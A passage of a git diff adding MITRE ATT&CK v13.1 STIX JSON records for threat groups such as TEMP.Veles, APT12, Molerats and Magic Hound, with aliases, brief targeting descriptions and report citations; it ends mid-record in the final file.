a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4.json new file mode 100644 index 0000000000000000000000000000000000000000..054419404c0ab5708ee0703511e82a15997ea339 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4.json 
@@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--5b506e91-b364-435e-bafa-816ad0b6d7e2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-11-30T22:46:40.135Z", + "name": "TEMP.Veles", + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing [TRITON](https://attack.mitre.org/software/S0609), a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)", + "aliases": [ + "TEMP.Veles", + "XENOTIME" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.3", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "created": "2019-04-16T15:14:38.533Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0088", + "external_id": "G0088" + }, + { + "source_name": "TEMP.Veles", + "description": "(Citation: FireEye TRITON 2019)" + }, + { + "source_name": "Dragos Xenotime 2018", + "description": "Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.", + "url": "https://dragos.com/resource/xenotime/" + }, + { + "source_name": "FireEye TEMP.Veles 2018", + "description": "FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html" + }, + { + "source_name": "FireEye TRITON 2019", + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. 
Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html" + }, + { + "source_name": "FireEye TEMP.Veles JSON April 2019", + "description": "Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html" + }, + { + "source_name": "Pylos Xenotime 2019", + "description": "Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.", + "url": "https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/" + }, + { + "source_name": "XENOTIME", + "description": "The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://attack.mitre.org/software/S0609).(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--ae41895a-243f-4a65-b99b-d85022326c31.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--ae41895a-243f-4a65-b99b-d85022326c31.json new file mode 100644 index 0000000000000000000000000000000000000000..93395010f96ccbd66c16f6793704e5ea75453234 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--ae41895a-243f-4a65-b99b-d85022326c31.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--89972034-bbd1-4ab4-a8bb-526c127c02bf", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-29T21:28:39.974Z", + "name": "Dust Storm", + "description": "[Dust Storm](https://attack.mitre.org/groups/G0031) is a threat group that has targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. (Citation: Cylance Dust Storm)", + "aliases": [ + "Dust Storm" + ], + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "type": "intrusion-set", + "id": "intrusion-set--ae41895a-243f-4a65-b99b-d85022326c31", + "created": "2017-05-31T21:32:03.306Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0031", + "external_id": "G0031" + }, + { + "source_name": "Dust Storm", + "description": "(Citation: Cylance Dust Storm)" + }, + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--c47f937f-1022-4f42-8525-e7a4779a14cb.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--c47f937f-1022-4f42-8525-e7a4779a14cb.json new file mode 100644 index 0000000000000000000000000000000000000000..0068a40ff6931df688486e4a51397c0637a842f1 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--c47f937f-1022-4f42-8525-e7a4779a14cb.json 
@@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--a6274d88-9b44-4086-b599-8d5ae87a2c75", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "APT12", + "IXESHE", + "DynCalc", + "Numbered Panda", + "DNSCALC" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--c47f937f-1022-4f42-8525-e7a4779a14cb", + "type": "intrusion-set", + "created": "2017-05-31T21:31:47.537Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0005", + "external_id": "G0005" + }, + { + "source_name": "APT12", + "description": "(Citation: Meyers Numbered Panda) (Citation: Moran 2014)" + }, + { + "source_name": "IXESHE", + "description": "(Citation: Meyers Numbered Panda) (Citation: Moran 2014)" + }, + { + "source_name": "DynCalc", + "description": "(Citation: Meyers Numbered Panda) (Citation: Moran 2014)" + }, + { + "source_name": "Numbered Panda", + "description": "(Citation: Meyers Numbered Panda)" + }, + { + "source_name": "DNSCALC", + "description": "(Citation: Moran 2014)" + }, + { + "source_name": "Meyers Numbered Panda", + "description": "Meyers, A. (2013, March 29). Whois Numbered Panda. Retrieved January 14, 2016.", + "url": "http://www.crowdstrike.com/blog/whois-numbered-panda/" + }, + { + "source_name": "Moran 2014", + "description": "Moran, N., Oppenheim, M., Engle, S., & Wartell, R.. (2014, September 3). Darwin\u2019s Favorite APT Group [Blog]. Retrieved November 12, 2014.", + "url": "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + } + ], + "modified": "2020-03-30T18:44:59.268Z", + "name": "APT12", + "description": "[APT12](https://attack.mitre.org/groups/G0005) is a threat group that has been attributed to China. 
The group has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments.(Citation: Meyers Numbered Panda)", + "x_mitre_version": "2.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--d1acfbb3-647b-4723-9154-800ec119006e.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--d1acfbb3-647b-4723-9154-800ec119006e.json new file mode 100644 index 0000000000000000000000000000000000000000..5616d94afdd6707f6a464ce2f4bafbc97dc0fc95 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--d1acfbb3-647b-4723-9154-800ec119006e.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--f767d99b-cb8f-4302-9f04-4ac0aad4a9ad", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Sowbug" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Alan Neville, @abnev" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--d1acfbb3-647b-4723-9154-800ec119006e", + "type": "intrusion-set", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0054", + "external_id": "G0054" + }, + { + "source_name": "Sowbug", + "description": "(Citation: Symantec Sowbug Nov 2017)" + }, + { + "url": "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "description": "Symantec Security Response. (2017, November 7). Sowbug: Cyber espionage group targets South American and Southeast Asian governments. Retrieved November 16, 2017.", + "source_name": "Symantec Sowbug Nov 2017" + } + ], + "modified": "2020-03-30T02:46:16.483Z", + "name": "Sowbug", + "description": "[Sowbug](https://attack.mitre.org/groups/G0054) is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia, particularly government entities, since at least 2015. (Citation: Symantec Sowbug Nov 2017)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411.json new file mode 100644 index 0000000000000000000000000000000000000000..6e7bd08d0fbcbbdb0698697cb2fe93336a6c8ec7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411.json 
@@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--61244bff-6bf2-472b-aade-61c5c9175b57", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Molerats", + "Operation Molerats", + "Gaza Cybergang" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411", + "type": "intrusion-set", + "created": "2017-05-31T21:31:55.093Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0021", + "url": "https://attack.mitre.org/groups/G0021", + "source_name": "mitre-attack" + }, + { + "source_name": "Molerats", + "description": "(Citation: DustySky)" + }, + { + "source_name": "Operation Molerats", + "description": "(Citation: FireEye Operation Molerats)(Citation: Cybereason Molerats Dec 2020)" + }, + { + "source_name": "Gaza Cybergang", + "description": "(Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)(Citation: Cybereason Molerats Dec 2020)" + }, + { + "source_name": "DustySky", + "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.", + "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf" + }, + { + "url": "http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf", + "description": "ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part 2. Retrieved August 3, 2016.", + "source_name": "DustySky2" + }, + { + "source_name": "Kaspersky MoleRATs April 2019", + "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/", + "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020." 
+ }, + { + "source_name": "Cybereason Molerats Dec 2020", + "url": "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", + "description": "Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020." + }, + { + "source_name": "FireEye Operation Molerats", + "description": "Villeneuve, N., Haq, H., Moran, N. (2013, August 23). OPERATION MOLERATS: MIDDLE EAST CYBER ATTACKS USING POISON IVY. Retrieved April 1, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html" + } + ], + "modified": "2021-04-27T20:16:16.057Z", + "name": "Molerats", + "description": "[Molerats](https://attack.mitre.org/groups/G0021) is an Arabic-speaking, politically-motivated threat group that has been operating since 2012. The group's victims have primarily been in the Middle East, Europe, and the United States.(Citation: DustySky)(Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)(Citation: Cybereason Molerats Dec 2020)", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--f8cb7b36-62ef-4488-8a6d-a7033e3271c1.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--f8cb7b36-62ef-4488-8a6d-a7033e3271c1.json new file mode 100644 index 0000000000000000000000000000000000000000..bba6fc889f6288481ac7ea4e4eafc3e3700d9c34 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--f8cb7b36-62ef-4488-8a6d-a7033e3271c1.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--22374c1b-05df-453b-85f3-e36b73f7ed0d", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "WIRTE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Lab52 by S2 Grupo" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--f8cb7b36-62ef-4488-8a6d-a7033e3271c1", + "created": "2019-05-24T17:02:44.226Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G0090", + "url": "https://attack.mitre.org/groups/G0090" + }, + { + "source_name": "WIRTE", + "description": "(Citation: Lab52 WIRTE Apr 2019)" + }, + { + "source_name": "Lab52 WIRTE Apr 2019", + "url": "https://lab52.io/blog/wirte-group-attacking-the-middle-east/", + "description": "S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019." + }, + { + "source_name": "Kaspersky WIRTE November 2021", + "url": "https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044", + "description": "Yamout, M. (2021, November 29). WIRTE\u2019s campaign in the Middle East \u2018living off the land\u2019 since at least 2019. Retrieved February 1, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[WIRTE](https://attack.mitre.org/groups/G0090) is a threat group that has been active since at least August 2018. 
[WIRTE](https://attack.mitre.org/groups/G0090) has targeted government, diplomatic, financial, military, legal, and technology organizations in the Middle East and Europe.(Citation: Lab52 WIRTE Apr 2019)(Citation: Kaspersky WIRTE November 2021)", + "modified": "2022-04-15T19:50:19.478Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "WIRTE", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--f9c06633-dcff-48a1-8588-759e7cec5694.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--f9c06633-dcff-48a1-8588-759e7cec5694.json new file mode 100644 index 0000000000000000000000000000000000000000..79c3c01cc79ce81c0dbf8dcf627fd3bfe47fcced --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--f9c06633-dcff-48a1-8588-759e7cec5694.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--a39b458c-2ec1-4b4a-bc07-79bb98347bf5", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "PLATINUM" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Ryan Becwar" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--f9c06633-dcff-48a1-8588-759e7cec5694", + "type": "intrusion-set", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0068", + "external_id": "G0068" + }, + { + "source_name": "PLATINUM", + "description": "(Citation: Microsoft PLATINUM April 2016)" + }, + { + "source_name": "Microsoft PLATINUM April 2016", + "description": "Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.", + "url": "https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" + } + ], + "modified": "2021-04-22T00:39:49.529Z", + "name": "PLATINUM", + "description": "[PLATINUM](https://attack.mitre.org/groups/G0068) is an activity group that has targeted victims since at least 2009. The group has focused on targets associated with governments and related organizations in South and Southeast Asia. (Citation: Microsoft PLATINUM April 2016)", + "x_mitre_version": "1.3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13.json new file mode 100644 index 0000000000000000000000000000000000000000..934fddd59b196b5fe008db74d19f41e6bf89b284 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13.json 
@@ -0,0 +1,156 @@ +{ + "type": "bundle", + "id": "bundle--96cfb954-c6c1-48b7-9cc8-c2d7d39344d2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-01-13T21:18:18.077Z", + "name": "Magic Hound", + "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA453 July2021)", + "aliases": [ + "Magic Hound", + "TA453", + "COBALT ILLUSION", + "Charming Kitten", + "ITG18", + "Phosphorus", + "Newscaster", + "APT35" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "5.1", + "x_mitre_contributors": [ + "Anastasios Pingios", + "Bryan Lee", + "Daniyal Naeem, BT Security" + ], + "type": "intrusion-set", + "id": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0059", + "external_id": "G0059" + }, + { + "source_name": "Charming Kitten", + "description": "(Citation: ClearSky Charming Kitten Dec 2017)(Citation: Eweek Newscaster and Charming Kitten May 2014)(Citation: ClearSky Kittens Back 2 Oct 2019)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Proofpoint TA453 March 2021)(Citation: Check Point APT35 CharmPower January 2022)" + }, + { + "source_name": "APT35", + "description": "(Citation: FireEye APT35 
2018)(Citation: Certfa Charming Kitten January 2021)(Citation: Check Point APT35 CharmPower January 2022)" + }, + { + "source_name": "ITG18", + "description": "(Citation: IBM ITG18 2020)" + }, + { + "source_name": "Phosphorus", + "description": "(Citation: Microsoft Phosphorus Mar 2019)(Citation: Microsoft Phosphorus Oct 2020)(Citation: US District Court of DC Phosphorus Complaint 2019)(Citation: Certfa Charming Kitten January 2021)(Citation: Proofpoint TA453 March 2021)(Citation: Check Point APT35 CharmPower January 2022)" + }, + { + "source_name": "TA453", + "description": "(Citation: Proofpoint TA453 March 2021)(Citation: Proofpoint TA453 July2021)(Citation: Check Point APT35 CharmPower January 2022)" + }, + { + "source_name": "COBALT ILLUSION", + "description": "(Citation: Secureworks COBALT ILLUSION Threat Profile)" + }, + { + "source_name": "Magic Hound", + "description": "(Citation: Unit 42 Magic Hound Feb 2017)" + }, + { + "source_name": "Microsoft Phosphorus Mar 2019", + "description": "Burt, T. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020.", + "url": "https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/" + }, + { + "source_name": "Microsoft Phosphorus Oct 2020", + "description": "Burt, T. (2020, October 28). Cyberattacks target international conference attendees. Retrieved March 8, 2021.", + "url": "https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/" + }, + { + "source_name": "Certfa Charming Kitten January 2021", + "description": "Certfa Labs. (2021, January 8). Charming Kitten\u2019s Christmas Gift. Retrieved May 3, 2021.", + "url": "https://blog.certfa.com/posts/charming-kitten-christmas-gift/" + }, + { + "source_name": "Check Point APT35 CharmPower January 2022", + "description": "Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. 
Retrieved January 24, 2022.", + "url": "https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/" + }, + { + "source_name": "ClearSky Charming Kitten Dec 2017", + "description": "ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.", + "url": "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf" + }, + { + "source_name": "ClearSky Kittens Back 2 Oct 2019", + "description": "ClearSky Research Team. (2019, October 1). The Kittens Are Back in Town2 - Charming Kitten Campaign KeepsGoing on, Using New Impersonation Methods. Retrieved April 21, 2021.", + "url": "https://www.clearskysec.com/wp-content/uploads/2019/10/The-Kittens-Are-Back-in-Town-2-1.pdf" + }, + { + "source_name": "ClearSky Kittens Back 3 August 2020", + "description": "ClearSky Research Team. (2020, August 1). The Kittens Are Back in Town 3 - Charming Kitten Campaign Evolved and Deploying Spear-Phishing link by WhatsApp. Retrieved April 21, 2021.", + "url": "https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf" + }, + { + "source_name": "Eweek Newscaster and Charming Kitten May 2014", + "description": "Kerner, S. (2014, May 29). Newscaster Threat Uses Social Media for Intelligence Gathering. Retrieved April 14, 2021.", + "url": "https://www.eweek.com/security/newscaster-threat-uses-social-media-for-intelligence-gathering" + }, + { + "source_name": "Unit 42 Magic Hound Feb 2017", + "description": "Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. 
Retrieved December 27, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" + }, + { + "source_name": "Newscaster", + "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)" + }, + { + "source_name": "FireEye APT35 2018", + "description": "Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.", + "url": "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf" + }, + { + "source_name": "Proofpoint TA453 July2021", + "description": "Miller, J. et al. (2021, July 13). Operation SpoofedScholars: A Conversation with TA453. Retrieved August 18, 2021.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453" + }, + { + "source_name": "Proofpoint TA453 March 2021", + "description": "Miller, J. et al. (2021, March 30). BadBlood: TA453 Targets US and Israeli Medical Research Personnel in Credential Phishing Campaigns. Retrieved May 4, 2021.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential" + }, + { + "source_name": "Secureworks COBALT ILLUSION Threat Profile", + "description": "Secureworks. (n.d.). COBALT ILLUSION Threat Profile. Retrieved April 14, 2021.", + "url": "https://www.secureworks.com/research/threat-profiles/cobalt-illusion" + }, + { + "source_name": "US District Court of DC Phosphorus Complaint 2019", + "description": "US District Court of DC. (2019, March 14). MICROSOFT CORPORATION v. JOHN DOES 1-2, CONTROLLING A COMPUTER NETWORK AND THEREBY INJURING PLAINTIFF AND ITS CUSTOMERS. 
Retrieved March 8, 2021.", + "url": "https://noticeofpleadings.com/phosphorus/files/Complaint.pdf" + }, + { + "source_name": "IBM ITG18 2020", + "description": "Wikoff, A. Emerson, R. (2020, July 16). New Research Exposes Iranian Threat Group Operations. Retrieved March 8, 2021.", + "url": "https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fa19de15-6169-428d-9cd6-3ca3d56075b7.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fa19de15-6169-428d-9cd6-3ca3d56075b7.json new file mode 100644 index 0000000000000000000000000000000000000000..85b21e532c5dac0d7c508d939b72cd748d3fb754 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fa19de15-6169-428d-9cd6-3ca3d56075b7.json 
@@ -0,0 +1,84 @@ +{ + "type": "bundle", + "id": "bundle--880c0636-578f-4ea5-9daf-b9862ae9e1f6", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Ajax Security Team", + "Operation Woolen-Goldfish", + "AjaxTM", + "Rocket Kitten", + "Flying Kitten", + "Operation Saffron Rose" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--fa19de15-6169-428d-9cd6-3ca3d56075b7", + "type": "intrusion-set", + "created": "2021-04-14T13:17:43.941Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0130", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0130" + }, + { + "source_name": "Operation Woolen-Goldfish", + "description": "Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://attack.mitre.org/groups/G0130) and the campaign Operation Woolen-Goldfish.(Citation: Check Point Rocket Kitten)(Citation: TrendMicro Operation Woolen Goldfish March 2015)" + }, + { + "source_name": "AjaxTM", + "description": "(Citation: FireEye Operation Saffron Rose 2013)" + }, + { + "source_name": "Rocket Kitten", + "description": "Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://attack.mitre.org/groups/G0130) and Rocket Kitten.(Citation: Check Point Rocket Kitten)(Citation: IranThreats Kittens Dec 2017)" + }, + { + "source_name": "Flying Kitten", + "description": "(Citation: CrowdStrike Flying Kitten )" + }, + { + "source_name": "Operation Saffron Rose", + "description": "(Citation: FireEye Operation Saffron Rose 2013)" + }, + { + "source_name": "FireEye Operation Saffron Rose 2013", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-operation-saffron-rose.pdf", + "description": 
